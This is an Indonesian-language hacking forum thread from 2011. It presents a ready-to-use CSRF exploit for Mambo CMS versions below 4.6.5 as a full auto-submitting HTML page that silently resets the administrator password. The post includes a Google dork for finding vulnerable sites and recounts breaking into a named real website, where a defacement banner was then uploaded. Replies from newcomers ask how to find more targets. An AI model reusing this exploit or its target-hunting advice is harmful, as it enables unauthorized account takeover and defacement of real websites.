Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

Post by poni » Wed Aug 31, 2011 3:00 am

Mambo adalah CMS web opensource gratis yg banyak digunakan sebagai sistem managemen website. Mambo < 4.6.5 memiliki bug CSRF (Cross Site Request Forgery) dimana hacker bisa mengubah password admin melalui script sederhana. Ingat loh, hanya versi dibawah 4.6.5 yang bisa ditembus dengan teknik ini.

Kita mulai aja yah. tool yang diperlukan hanya
[-] Notepad dan
[-] Browser

buka notepad dan masukkan script dibawah ini. atau edit sesuai target website. google dork = Mambo is Free Software released under the GNU/GPL License.

Code: Select all

<html>
<head>
 </head>
 <body onload="javascript:fireForms()">
 <script language="JavaScript">
 
function fireForms()
{
    var count = 1;
    var i=0;
 
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
 
	</script>
<form action="http://www.classiminashost.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm"> 
	
	<input type="hidden" name="name" value="Administrator" /> 
	<input type="hidden" name="username" value="admin" /> 
        <input type="hidden" name="email" value="" /> 
	<input type="hidden" name="password" value="123456" /> 
	<input type="hidden" name="password2" value="123456" /> 
	<input type="hidden" name="gid" value="25" />				
	<input type="radio" name="block" value="0" checked="checked" />
	<input type="radio" name="block" value="1" />
	<input type="radio" name="sendEmail" value="0" />
	<input type="radio" name="sendEmail" value="1" checked="checked" />

</form> 
perhatikan source diatas.
target web adalah http://www.classiminashost.com
username = admin
password = 123456

itu artinya penulis mengganti password administrator di http://www.classiminashost.com dengan 123456 tanpa perlu mengetahui password sebelumnya.

simpan dengan nama hackmambo.html, disini penulis menyimpan file hackmambo.html di desktop. lalu jalankan di browser anda. perhatikan gambar berikut dibawah:

Image
setelah hackmambo.html dijalankan di browser, maka anda akan melihat ada 4 radio button diatas. tunggu beberapa saat sampai halaman redirect dan mengirimkan pengubahan password admin ke website target.

Image
halaman akan redirect ke http://www.classiminashost.com/administ ... mainmenu=1 . isi username dengan admin dan password 123456

Yep.. sekarang penulis berhasil masuk sebagai administrator di http://www.classiminashost.com/ yang masih menggunakan mambo bersi 4.6.2. hmm sepertinya website ini baru dibuat.

Image

:) sekalian nitip logo xcode.

Code: Select all

http://www.classiminashost.com/images/stories//bannerxcode.bmp
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

Jepret
Posts: 10
Joined: Fri Apr 30, 2010 3:12 am
Contact:

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Post by Jepret » Wed Aug 31, 2011 4:31 am

Wow Bos Poni Ga ada mateee nya... mantep Gan..

bos tanya neh sy msh newbie.. ciri2 web mambo apa bos mau coba target lain.. hehehhe

onteill
Posts: 1
Joined: Sun Sep 04, 2011 6:20 am

reza

Post by onteill » Tue Sep 06, 2011 8:16 pm

gan ane udah cobak ni tehnik..
tpi cuman masuk login formnya doang..
kgak bisa masuk ke admin situsnya..
mohon pencerahannya...

djisamsoe
Posts: 22
Joined: Tue Sep 27, 2011 7:42 am

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Post by djisamsoe » Thu Sep 29, 2011 8:48 am

ijin nyimak bos..! terusin dah

andri x code
Posts: 3
Joined: Sun Aug 29, 2010 9:23 pm

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Post by andri x code » Fri Nov 04, 2011 11:25 pm

kak klu untuk CMS mambo yang versi 4.5.2 gimana ya??
klu aku coba metode seperti yang di atas, ngk bisa masuk kk
ada tulisan Incorrect Username, Password, or Access Level. Please try again di sana kk
:(

Post Reply

Return to “Web Hacking”